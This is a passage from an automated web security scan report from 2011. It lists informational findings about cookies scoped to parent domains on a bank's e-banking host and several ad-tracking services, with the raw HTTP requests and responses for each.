Path:   /en/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/ HTTP/1.1
Host: ebanking.ubs.com
Connection: keep-alive
Referer: http://www.ubs.com/1/e/online.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982088978:ss=1309981804815

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:59:55 GMT
Server: Apache
Pragma: no-cache
Set-Cookie: NavLB_EB=ebanking1.ubs.com; Domain=.ubs.com; Path=/; Version=1; HttpOnly
Connection: close
Location: https://ebanking1.ubs.com:443/en/?NavLB_EB=1309960795
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 286
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A
...[SNIP]...

9.16. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=105966 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ONY2QKBYMVD5FEFX2BR37K%3A20110628%3A2%7CXEXAP5HEBFET3JK734P3BR%3A20110628%3A1%7COBXRF4HH6JFXLDDVFSEQTM%3A20110628%3A1%7COZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A4%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A3%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1%7CM5OOXYHITZA7XGIMSMOSWH%3A20110628%3A1; icu=ChIIvoIBEAoYASABKAEw3eiy8AQQ3eiy8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw))ByG5K)WgP%/zT#@:#8z-dUp)u]fwkNAf3WE5g%h%ksMZLow4G#V7_m:..iqG+b8]rH1.9<ktOde+dW=1iJ+Ar'n/Jw^sESpK8YPSkq')!p-gykgfN*Nur[3nJXya+Gmd486UM.Pm#'2N=*)ZaLb>@fJ1c#%)qL*oJoq0?!q:WwuOR=+o+0_Q_RWDtJ#gVm5)4<[`P/TTjh(s?Bw1EvKd+nb8sEFf=nnBmkoioWBp9)fb3AE#7d`e#P_F_muE!5Gb:-C6g<PYFc<c]BRSv#[Frf#FRzGk!_kjx1#$zVHqBa@YYuxdYm/8tto:XM?Mhe--/s09Y12!CeSFNR*/:>SPYuw2ftJID!)!vN!i[i8SR8swwOeo-'p%T42H(TOg!%w$1UJ_XK>nO:v#6isueX>9YlfuItK:x[60xq=gGzpNMNmpF29<N$IYh:bgLt^yAtpYT^qr(oscBbOe%XR:zc'v^/i0<VTlKRp8=O$.4-%bp#?B[XMsFivXc91M+qIjt:p8G(icTdxdu'snIh*.m*-EWc/SHSYmL!TMC1Lkob(Y*+(Zd*7D=h1z_kr>GJ_QDni<KP9l'uW7HPG'NJjK@Q9I<$k>A.rZvg.LgFR9kW0v?)_7A9)0xdK'c4#)-u'CsZGn?!Rjw6zWDal_u^`.CYU:LZdFchj/zZgN.(OA9BaccO@!`Mqu@Il%ADZf%UsNE[fpP#H_FUuTxRgh`3U$5p?43s#Jnb3cFRv<6TIN>fZHO>>LjO1l0#H.4>mB'pC0QO+gqS

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 07-Jul-2011 11:22:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 11:22:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw))BAfzI)_c8i<lK#0Pn0I13%'hiiUjya]NePJuWIyt1!shO5+W]943^xjP-VZ[#v*7V*E?1lK7GeQXy%V*<X5zx]>^$7/zi5rMj5lo5_o3VW/ar7FCnRy^>>C7):gM6=r*i/#[pB=SYhiVs3JWW[xw:ivtn!CsFd61PLaw[[<DqkR$P4cs]+7urA@xYXfsUrZLg:tpzl70ZO)+geN%U1Z]J'4s!`?Xji#p[+yc]@WsXjaesPv3AskX__l1d??wa*+5K/WQa*kR$la!)<Cj'02sWS=WG$$j3>zgX=8EH4SDC8Z-/F4_'st9$`gbGQuBKVpBfqhdWwW5NR+e+3n_MG-%8`u(0RFuyB0hNX4N_h9>FBfLBgaO@U!Gj=YwrH[?*OaDXRY(Hwv_8g4-.'i+mf$4MZ5*Lu[ye43%+z'*x9d3!J]Y$0/b+I8#rbe^wI6`JMsCnw9mpb^XQti+CJ8i?LwtLX>!V1veMAp]t`?Io!t$TP6*l[-W63VEmULhD1hJwvnokI+S6BoE8JQ!2_3MZEa#HT#.Hl)7>`J58Yy*^ameq%S-i$R?fb>4xBPON5kf!5iIZ_YF(Z@q7ReF@c-%WXSTbieBIFN^Q7Ep91r0l#xmv*D<l<g)s3]t'#:x`sB80-wg+Rxj$'R8>9RF<xP+c1s!+(.c4w]6k*5mY:5<aZFNn7Z>)7d)0r7eYKtQxzBfVw0a:d$3Ns`+OctOR_)UV/oOWdU?CY_$S[Gl]_eLeT*cat-oSRicoEB.e1.C`tt-t'(UX_3nO6'[0_!>K(LiZ$plNwvB4`gM6t!v; path=/; expires=Tue, 04-Oct-2011 11:22:10 GMT; domain=.adnxs.com; HttpOnly
Location: http://cm.g.doubleclick.net/pixel?nid=appnexus1
Date: Wed, 06 Jul 2011 11:22:10 GMT
Content-Length: 0


9.17. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=9787d0d4-9d7b-4605-985d-7786f61ba68e HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293; tpd=e20=1311819163224&e90=1309831963205&e50=1311819163964&e100=1309831963322

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8803=734323; domain=.interclick.com; expires=Tue, 06-Jul-2021 15:39:03 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Wed, 06 Jul 2011 15:39:02 GMT

GIF89a.............!.......,...........D..;

9.18. http://js.revsci.net/gateway/gw.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=K08784 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzENbgpj37xX1GlJO7a3wEU0cw3fRauBLbLa1hxIJOjDBlu18gnrOpSO3YjF0wMKV4ipvKrR3EogwrxHeNknjMH6SqUl22pXLAnFTV9qIeZlIZDHhyA0dnb6CwiAhxROt1YH8AVXH8382QGU/vgf98KjcLbIKBY60ENFOM7PSFI0WvHFebNnpD4olAZ8EKv0T8FyPx6DB7zblwlm/kfK0gsDM9HWwjjlpRArVpgdwu7hzWke/0YixMmmj5fRg6bBCx0SlvtbNmqCvsL9F+ThBet19A04HxTqU8b3nQhNZQGPBELixm9ZPLcb0nND8FSs5lEnuFkpXMu9XllQPRKily+32yrrvpvCQ5hdDDws3fRNKu9/VbXaqnftCbneHUzm69ZOZ0bU3GpkV37psEePMvYy5M9A1WMNQTLz3tsX5kfpLytLXUghOOqB/pQnGvlLrG3jR52bk5VGeRrE7ifz9y1n9uuhpUSHstnDVJAhckVdxAf0dhr+BzFueK6tJwy5o358GYKr4ry9mXUxrBhWdfeEgP0zm25Ih8ZAyh2cru1GAXaBOIKDNsQqAbhr4/x0AM3+BVLmPMMY12n3J+s4kc4awJtt7+FQgXo1NPLkMhjUdOAZcvjlggsTUMim918XskWnLFxgCEjyFn5gwnfpprqPLwri12NcuTcWLAKw8g0DdBvoeQgcr66oEHP6hTz2knqS5hfh0KTnj2uAkBw/WcyKvQ0K6mV+ujsqYMntEg3wHxat+ozLZkyYzVmCjTff6Yssgszk+Ln2nBOsMCNsu3grl8/mjf+JrnijOGn0fAJIpAgw5LSKbzNNFIEzolKLS9jsskM78jnojzRjl18iF6JsYngRg42f/OjDM/4XPdH/kiuKqMwT8neptYVN8gAeirQn83vTADE6vJdGN/m2j8Isv5DTBi+BvWFDALDwARgW2CrZCOjRaXOCH+mCDLkyaBfdswb3s8MQGf8OnLkXbgZxht6J0pymsopMR1/erCrDSKhaDjW3dbxj2Ec2ruEnAZ1K16NpPVlZAwGIQOKVna8Eph3bGwiPsyh0aVeLizRyS727aLulAX44yHYtN7pvQycigS4oAVgoexNRjIDXQytUbnNWFYeh1W4CDCtEi/GSzoQB+k1xV4aTQw6qbsH9WFgQsnQZ2p7dtgw1PcRM1q58YfPNexKh9bv3HYj68SoXzfuFseAwDbBWVFoQIV3np8KjOAy/XFT3w8wD3Uk2qoGAqY6jvE5IEg2CETzhFMgAby1SLgECONA+/NiEOpTsefwlKrp4QbyubMrUU8QqWcfpYLQmG7EEAZMaD61U30gLGpyTDz+XTK1Aetxz1XYZ7g1+7zdI+2Jz80HqzHAuVQrwbViu98spWaM0QPlKW5i8JhSI84NTuETOMs4sVoakoTsytqLu/NICBhVKXA9krf692p+28S/XtfL7pe+8ITPA3CXgdnZi3/sVFt5SczdpaBGG3fXkatl1cEkySH37s3Q5QzkvxK0JaT2hRSLjHvQq7V789ZV3A0rtyOhZFIU4m/biU0ASEvJJaC023+ugedPPFcdKly4XIbrT0vHawWP8xdGHsTFgGioYb1WZogmwmjaqZmwUg4TzO1mmsa6k7V+XnsdYiYLp1jN2z3CvCXdYQNY0GbpiIN0MYulPLdp0Qysc4z/0y9NO0uN8KHzT3mWvfthj1Naxji6UD7Fq59FA00aUdvRRrl9Ii2oMu/ZSC31YZhyTl8vy06iSMzRCHhgzGUXTrIr26/AOZ28M3xZjyQx4NbTI9+0/gv1qHeP0D+0GGfIi+c/Hnoj46u05Oz2rfd0IHItCcszLJpVkV7WgbA==; rsi_segs_1000000=pUP94z+huXIMH/C1v6FY5BD9CU6duy5U1bkTIGbg2kQ6O500fvSx4UTo+UUZb5s27MU/gF1/ux7sGskdcPE/6idJLlUd7AAuXxxKy8BUcq3cPyLWWekcccnlFzHzZkpIVGfqfRixeJKIBCGYBys6pp34bnWBjoi4hWw0DEv8dZ1MKmhKcNVsgETg9Nxm9eUl2bYV4lz3F2qKGE4AQLEr2EpApywjvzC6ooxJGX2EpUDKZlDNGVCwlbwye561cEN0B95VelQaph/AIlLefSqhn5oCS/k/ffgQkvaHKwO3Hq2Jzt8Egb1MjdZhZUG2cS4+A/q9YkInuHps6t/FPHBFw5HhQo4/Cnazuco89WTgh/dG0NX2NzX9OHtWRemoBuTHV9Uzk58uZ3qvc/CWxOl0LVo6Mubh94RiFrR2pY2eUGuzMIfxqu1g5tF34x6XqpYBxymEeg7y5u6rHubC+TdBqemh88ANgsz6DyIi8PlIddeOxKdS38ycSBeL7ivCg9OcwKHelps5XFngUJ3CsZmV1D8+myaR+JjiRqTsZ5lwsaSdrB1ttygPM0cJVYaoJtMmveKTqltFKrTirU5KmpF8YBVx81cnIA2P6JaVmf2NK10qC7myMOpZ9M0P7sDNtMtyhoW8vaHg+DQsVRT4OB3V/8sMk/tMnEbNnGx1TV0N3YMAdxJkT99c4I4VazVkf7e8/iyP8wGSmzPUsD5yKdOMe1AeGm4f8IRVXN+eZ/iJtioCfSYznCj/ZRVHpQ8GtMbVwmql1/CQzDUY; rtc_Vpu9=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; rsiPus_TE1N="MLsXtTENJApvJ5EkOsXUOAMIrN7cVDsRAI1JlA2+kP2O+rpZrFxjRJpWO95J9jw2ez7PuZwvYpKzPZnmx73e3+g+RBhF6m2qS5qlx6y79pJEUaqR3iscgzeYYjYHE4zarxjYFkAK699GLRvC/lOpNi3oKjSDUjQz6bRd5RumVseON9retzHXthkJz7rmg/AoXcHq/5pWJqRHvxa4sjMtfKPaDQ33n2MzatS1JHKj3inoOBwKFOrUvo8YaYkbDBX35ir0cxEU/FuG0/p0o7qD+/iAZjMCOEMSy6LFwfP/J639cuKKTM9hCsXY7SRInhwCovfpF72sRVZjw87NKbbB5Qql0y6OOGyQHjmdqnB673xTTed/W8l8FYytBOFCjfyyAn+9fAsQpGJACvABUg65KeD2WZxuUkW8tcwRvHrD8CCkEjJAiJaJ82KVgPv/NORGeWc9yQYH8J8DvtXM30s4lrbgRaOIuDlgmpCQPyY96wRUB5WctGJ5ukZ+VdijEsGEXKuAkODAAvCZgyZdj8pk/yhkS0E5DWzwQNhbMQqx9ZcSOd2BRF73UX97YK9Y2LBhI5D5YdW6AxIcxgZ75K3YEm2jyg8wVYiegYI4koi6fjSUGpU/aclERWBbApHsM8wQvxy/xAjqz5YU6sjueUp2EQCgOSizhocs/l635dkgU41sM3QM4vfW+yqPZggnyj4CCBDgYunklnGSR1uUwhJ5hDMoOqLrb5l6iy7ocKWjGp4dHvAEKwJ9W7MtSY1f41qRjmHDNW9/r6Q8aJUKpTJDmtMSHptJB5b7H/DyCI9h2P2Jc53oHYsuhzMyCqTEHsZ1NHiZncWyXVikqCft8J5KWWMaHRDZJ4xrlnYbg9QbfDpW13lV2wfIa5JYPZCAicT6d7jumtyAidZ9MhQT3qWk+vU2eX/ch32cEA3iYr2o27vwbqcnfZMKtZLUqKawF9qclwanTscXsJVIuz+EFY2T/cgVP6dGTkX0PEfzwfQto1hHpBtSU+5CiN7tPVfU3EWnub4+QSFEOUm98aAA9rwkukyqI0H52kYMKTrOExsDgc4HCR3ZpaW/yqUqrkZtHgwrPXhRSgzmUynN1lnLdZIdNR1ojLIOQfdCYDd8YoVzuIGzZBAACC754kxcTZjDmurWrZoeWjI2k4sycb8WveRTIGNS0tCpCEnvVK6DRSZeRPZ94F89r62QMAUaW0jXDnDKORbKBvUUy2WvWoaGLHNMjts8k4qt7Pta2W9Yam9cirruDGatLKblpOHKBcIUQK0tZfcSJIXU/LdkOfqtbzkELtKtuTyGXEnQxPmL98WMjfKPjd9BbcZfBwr+okep4nH+ENdSMYVP/LRqrdQdRIpj3oIsiVfqfv5kuG3oAA0+UypOfQ/LDMyvu1OeQgp7zfqCKAW9gNK3JnMhNNyF2y+GB3/bTOyaIWb9WyJTQ6FZp0Lp4mbDTa0xbsVieWfPhWs1ui+rGo+GHkveFJJKHiuHlJ/yTOvZNAA4cv9yWcaSVCbV9gfI/liUeuPq30bAU6XE+IFUECA8aiAUIfwBYuEgbzMkZpqjj8XvpIGujHXxiCPL"; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
